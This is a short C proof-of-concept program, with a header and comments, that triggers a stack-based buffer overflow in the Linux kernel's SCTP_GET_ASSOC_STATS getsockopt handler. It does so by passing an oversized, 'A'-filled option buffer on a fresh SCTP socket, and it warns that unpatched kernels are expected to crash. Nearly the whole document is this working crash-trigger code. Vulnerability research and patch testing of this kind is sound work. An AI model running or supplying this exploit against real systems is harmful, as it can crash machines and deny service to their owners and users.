Proof-of-concept code that demonstrates a stack-based buffer overflow in the Linux kernel's handler for the SCTP_GET_ASSOC_STATS getsockopt() option: it issues the call on a freshly created SCTP socket with an oversized option length. On an unpatched kernel this is expected to crash the machine, so run it only in a disposable VM.
588169341383534eb48214aef23de1ecd3b8f43f820fc7090163879acbcb9dc3
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>
/* Option-level and option-name values for the getsockopt() call below,
 * hard-coded here rather than taken from <netinet/sctp.h> -- presumably so
 * the PoC builds without the lksctp-tools headers installed.
 * NOTE(review): verify both values against the target kernel's
 * <linux/sctp.h> before relying on a negative result. */
#define SCTP_GET_ASSOC_STATS 112
#define SOL_SCTP 132
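/*
 * Entry point: issue a single getsockopt(SCTP_GET_ASSOC_STATS) on a fresh
 * SCTP socket with an option length far larger than the option's result
 * structure. The overflow itself happens inside the kernel (see the file
 * header); no SCTP association is established here, so the only user-space
 * inputs are the socket and the oversized length.
 *
 * WARNING: on an unpatched kernel this is expected to corrupt the kernel
 * stack and oops/panic the machine -- run it only in a disposable VM.
 *
 * Returns 0 once the call has been issued (reaching that point means the
 * kernel survived, e.g. because it rejects the length), 1 if the SCTP
 * socket could not be created.
 */
int main(void)
{
	/* Size of the bogus option buffer. It only has to exceed the size of the
	 * kernel's stats structure; the original PoC used a literal of roughly
	 * this length. Bump it if a target needs a bigger overflow. */
	enum { PAYLOAD_LEN = 256 };

	/* A writable array, not a string literal: getsockopt() writes back
	 * through optval, and writing to a literal is undefined behaviour (and a
	 * read-only page in practice). */
	unsigned char payload[PAYLOAD_LEN];
	socklen_t len = sizeof payload;
	int fd;

	memset(payload, 'A', sizeof payload);

	fd = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP);
	if (fd < 0) {
		/* Typically EPROTONOSUPPORT when the sctp module is not loaded.
		 * Continuing with fd == -1 would only produce EBADF below and
		 * prove nothing about the kernel. */
		perror("socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP)");
		return 1;
	}

	/* *optlen is deliberately oversized: the kernel side presumably copies
	 * that many bytes from optval into a fixed-size stack object, which is
	 * the overflow this PoC targets. A fixed kernel is expected to reject
	 * the length instead (likely EINVAL), which the perror() makes visible. */
	if (getsockopt(fd, SOL_SCTP, SCTP_GET_ASSOC_STATS, payload, &len) < 0)
		perror("getsockopt(SCTP_GET_ASSOC_STATS)");
	else
		printf("getsockopt succeeded, len=%u (kernel survived)\n",
		       (unsigned)len);

	close(fd);
	return 0;
}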